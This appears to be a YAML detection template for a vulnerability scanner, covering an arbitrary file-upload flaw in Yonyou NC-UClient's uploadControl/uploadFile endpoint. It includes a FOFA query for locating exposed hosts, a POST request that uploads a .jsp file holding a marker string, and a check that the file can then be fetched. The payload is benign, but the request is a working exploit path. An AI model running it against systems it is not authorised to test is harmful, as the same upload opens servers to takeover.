product: 用友NC-UClient
vName: 用友NC-UClient uploadControl_uploadFile接口文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友NClient mp接口存在文件上传漏洞，攻击者可在授权情况上传任意文件，进而获取服务器控制权限。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /mp/uploadControl/uploadFile
      file:
        file:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - text/plain; charset=utf-8
      dataJson:
        submit: 上传
    verify:
      path: /mp/uploadFileDir/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and